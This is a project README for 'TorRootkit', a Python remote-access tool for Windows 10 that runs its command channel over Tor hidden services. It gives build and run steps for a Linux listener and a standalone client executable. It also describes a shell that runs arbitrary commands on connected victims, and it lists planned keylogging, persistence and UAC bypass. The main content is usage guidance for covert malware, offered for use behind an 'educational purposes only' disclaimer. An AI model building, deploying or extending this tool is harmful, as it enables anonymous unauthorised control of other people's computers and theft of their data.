/TorRootkit

A python3 Rootkit developed for windows 10, working over tor hidden services.

Primary LanguagePythonMIT LicenseMIT

Tor Rootkit

Docker Image CI Standalone Compilation

A Python 3 standalone Windows 10 Rootkit. The networking works over tor hidden services.

Installation

  • Clone with git:
git clone https://github.com/emcruise/TorRootkit.git
  • Change directory to the repository:
cd ./TorRootkit

Listener

The listener is designed to run on linux.

  1. Build docker container:
sudo docker build -t listener .
  1. Run docker container:
sudo docker run -it listener

Client

The client is designed to run on Windows 10.

Prerequisites

  1. Change directory to client:
cd .\client
  1. Install all pip3 dependencies:
pip3 install -r requirements.txt
  1. Build executable from build.py:
  • downloads Tor Expert Bundle
  • bundles python3 interpreter and tor expert bundle into 1 standalone .exe file
python build.py <listener-onion-address> <listener-onion-port>
  1. Execute the bundled client:
.\dist\client.exe

Disclaimer

Use for educational purposes only.

Features

  • Standalone executable, including python interpreter and tor expert bundle (~13MB)
  • the whole communication works over tor hidden services which guarantees some degree of anonymity
  • Listener can handle multiple clients
  • Client auto reconnects

Upcoming Features

  • cross-plattform compatibility
  • Up- and Download functionality
  • Screenshots
  • Keylogging
  • Persistence
  • UAC-Bypass

Listener Shell Usage

Listener Server Shell

Command Explanation
help Shows the help menu
^C or exit Exits the shell
list lists all connected clients with their according index
select <index> start shell with client

Client Shell

Command Explanation
help Shows the help menu
^C or exit Exits the shell and returns to listener shell
os <command> Executes a command in the clients shell and returns the output

Contribution

All contributions are appreciated.

Credits